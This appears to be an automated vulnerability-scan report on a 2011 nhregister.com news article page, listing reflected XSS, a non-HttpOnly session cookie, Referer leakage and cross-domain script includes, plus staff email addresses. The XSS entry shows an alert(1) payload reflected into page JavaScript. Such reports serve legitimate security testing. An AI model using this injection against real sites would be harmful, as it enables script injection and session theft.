1. Cross-site scripting (reflected)
2. Cookie without HttpOnly flag set
3. Cross-domain Referer leakage
4. Cross-domain script include
Severity: High
Confidence: Certain
Host: http://www.nhregister.com
Path: /articles/2011/06/02/news

GET /articles/2011/06/02/news
Host: www.nhregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: private, max-age=0, no-cache
Content-Type: text/html
Date: Fri, 03 Jun 2011 01:39:35 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=5000
Expires: Wed, 26 Feb 1997 08:21:57 GMT
X-PHP-Engine: enabled
Connection: close
Set-Cookie: has_cookies=1
Set-Cookie: PHPSESSID=de476ab985
X-Cache-Info: not cacheable; response specified "Cache-Control: private"
Real-Hostname: nhregister.com
Content-Length: 57182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR
<html xmlns="http://www.w3.org
...[SNIP]...
<br"
s.prop9="viewmode=286a5b";alert(1)/
s.prop10=""
s.prop11=""
s.prop12=""
s.prop13=""
s.prop14=""
s.prop15=""
s.prop16=""
s.prop17=""
s.prop18=""
s.prop19=""
s.prop20=""
/* E-commerce Variables */
s.campaign=""
s.state=""
...[SNIP]...

Severity: Low
Confidence: Firm
Host: http://www.nhregister.com
Path: /articles/2011/06/02/news

GET /articles/2011/06/02/news
Host: www.nhregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Date: Fri, 03 Jun 2011 01:39:26 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=5000
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-PHP-Engine: enabled
Connection: close
Set-Cookie: has_cookies=1
Set-Cookie: PHPSESSID=a16ea81f57
X-Cache-Info: not cacheable; response specified "Cache-Control: no-store"
Real-Hostname: nhregister.com
Content-Length: 57857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR
<html xmlns="http://www.w3.org
...[SNIP]...

Severity: Information
Confidence: Certain
Host: http://www.nhregister.com
Path: /articles/2011/06/02/news

GET /articles/2011/06/02/news
Host: www.nhregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Date: Fri, 03 Jun 2011 01:48:31 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=5000
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-PHP-Engine: enabled
Connection: close
Set-Cookie: has_cookies=1
Set-Cookie: PHPSESSID=4cee821714
X-Cache-Info: not cacheable; response specified "Cache-Control: no-store"
Real-Hostname: nhregister.com
Content-Length: 57851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR
<html xmlns="http://www.w3.org
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax
<script type="text/javascript" src="http://ajax
...[SNIP]...
</script>
<script type="text/javascript" src="http://e.yieldm
...[SNIP]...
<body>
<script type='text/javascript' src='http://stats
...[SNIP]...
<a href="/rss/"><img src="http://images
...[SNIP]...
<li><a href="http://nhregister
...[SNIP]...
<li><a href="https://ctwebcirc
...[SNIP]...
<li><a href="http://forms
...[SNIP]...
<a href="/"><img src="http://images
...[SNIP]...
<li><a href="http://remembe
...[SNIP]...
<li><a href="http://forms
...[SNIP]...
<li><a href="http://jobs
...[SNIP]...
<li><a href="http://www
...[SNIP]...
<li><a href="http://nhregister
...[SNIP]...
<li><a href="http://newhave
...[SNIP]...
<li><a href="http://fyinewhaven
...[SNIP]...
<li><a href="http://fyinewhaven
...[SNIP]...
<li><a href="http://newhave
...[SNIP]...
<li><a href="http://newhave
...[SNIP]...
<div class="searchBoxRight">
<img src="http://images
<!-- <span id="yahooWebSearch">
...[SNIP]...
<div class="sc_twitter">
<a href="http://twitter.com
...[SNIP]...
<a href="javascript:void
</a>
...[SNIP]...
<a href="http://www
...[SNIP]...
<A HREF="http://www
...[SNIP]...
<a href="/rss"><img src="http://images
<div class="piece" style="margin-top:2px">
<script type="text/javascript" src="http://w.sharethis
...[SNIP]...
<a href="?viewmode=comments"
...[SNIP]...
<i> By posting here you agree to abide by our terms and conditions and privacy policy which can be viewed by clicking <a href="http://www
...[SNIP]...
<a href="javascript:void
</a>
...[SNIP]...
<a href="http://www
...[SNIP]...
<A HREF="http://www
...[SNIP]...
<a href="/rss"><img src="http://images
<div class="piece" style="margin-top:2px">
<script type="text/javascript" src="http://w.sharethis
...[SNIP]...
<div class="mod_box clear" >
<img src="http://images
<!--<h3>
...[SNIP]...
<div id="hotdeallogo"><a href="http://fyinewhaven
...[SNIP]...
<param name="allowscriptaccess" value="always" /><embed src="http://eplayer
...[SNIP]...
</div>
<iframe src="http://widget
...[SNIP]...
<br />
<script src="http://cdn
...[SNIP]...
<ul>
<script src="http://hosted2.ap
...[SNIP]...
<p class="more"><a href="http://hosted2.ap
...[SNIP]...
<p class="image"><a href="http://fiscall
<h3><a href="http://fiscall
...[SNIP]...
<p class="image"><a href="http://hamdenn
<h3><a href="http://hamdenn
...[SNIP]...
<p class="image"><a href="http://allabou
<h3><a href="http://allabou
...[SNIP]...
<p class="image"><a href="http://naugatu
<h3><a href="http://naugatu
...[SNIP]...
<li><a href="http://remembe
...[SNIP]...
<h3 style="margin:0"><a href="http://newhave
...[SNIP]...
<li><a href="http://jobs
...[SNIP]...
<li><a href="http://www
...[SNIP]...
<li><a href="http://nhregister
...[SNIP]...
<li class="first"><a href="http://forms
...[SNIP]...
<li><a href="https://ctwebcirc
...[SNIP]...
<li><a href="http://nhregister
...[SNIP]...
<li><a href="http://www
...[SNIP]...
<a href="/rss/"><img src="http://images
...[SNIP]...
<li><a href="http://www
...[SNIP]...
<li><a href="http://www
...[SNIP]...
<li><a href="http://www
...[SNIP]...
<li><a href="http://www
...[SNIP]...
<li><a href="http://www
...[SNIP]...
<li class="last"><a href="http://www
...[SNIP]...
</span>, a <a href="http://www
...[SNIP]...
</span> <a href="http://www
...[SNIP]...
</span> <a href="http://www
...[SNIP]...
</span> <a href="http://www
...[SNIP]...
<noscript><a href="http://www.omniture
src="http://jlnhregi
height="1" width="1" border="0" alt="" />
...[SNIP]...
<!-- Begin Newstogram/Daily Me Tracking -->
<script type='text/javascript' src='http://static
...[SNIP]...
<noscript>
<img src="http://b.scorec
</noscript>
...[SNIP]...

Severity: Information
Confidence: Certain
Host: http://www.nhregister.com
Path: /articles/2011/06/02/news

GET /articles/2011/06/02/news
Host: www.nhregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Date: Fri, 03 Jun 2011 01:39:26 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=5000
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-PHP-Engine: enabled
Connection: close
Set-Cookie: has_cookies=1
Set-Cookie: PHPSESSID=a16ea81f57
X-Cache-Info: not cacheable; response specified "Cache-Control: no-store"
Real-Hostname: nhregister.com
Content-Length: 57857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR
<html xmlns="http://www.w3.org
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax
<script type="text/javascript" src="http://ajax
...[SNIP]...
</script>
<script type="text/javascript" src="http://e.yieldm
...[SNIP]...
<body>
<script type='text/javascript' src='http://stats
...[SNIP]...
</a><script type="text/javascript" src="http://platform
...[SNIP]...
<div class="piece" style="margin-top:2px">
<script type="text/javascript" src="http://w.sharethis
...[SNIP]...
<div class="piece" style="margin-top:2px">
<script type="text/javascript" src="http://w.sharethis
...[SNIP]...
<br />
<script src="http://cdn
...[SNIP]...
<ul>
<script src="http://hosted2.ap
...[SNIP]...
<!-- Begin Newstogram/Daily Me Tracking -->
<script type='text/javascript' src='http://static
...[SNIP]...

Severity: Information
Confidence: Certain
Host: http://www.nhregister.com
Path: /articles/2011/06/02/news

GET /articles/2011/06/02/news
Host: www.nhregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Date: Fri, 03 Jun 2011 01:39:26 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=5000
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-PHP-Engine: enabled
Connection: close
Set-Cookie: has_cookies=1
Set-Cookie: PHPSESSID=a16ea81f57
X-Cache-Info: not cacheable; response specified "Cache-Control: no-store"
Real-Hostname: nhregister.com
Content-Length: 57857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR
<html xmlns="http://www.w3.org
...[SNIP]...
<a href="mailto:mtuccitto@nhregister.com">mtuccitto@nhregister.com</a>
...[SNIP]...
<a href="mailto:mtuccitto@nhregister.com">mtuccitto@nhregister.com</a>
...[SNIP]...
<input type="hidden" name="recipient" value="mbrackenbury@nhregister
...[SNIP]...
<input type="text" name="from" id="from" value="donotreply@journalre
...[SNIP]...